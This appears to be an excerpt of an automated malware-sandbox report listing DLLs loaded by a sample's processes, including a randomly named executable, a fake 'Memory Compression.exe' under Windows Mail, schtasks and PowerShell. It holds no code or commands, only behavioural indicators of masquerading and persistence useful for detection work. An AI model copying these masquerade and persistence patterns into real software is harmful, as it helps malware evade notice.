                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
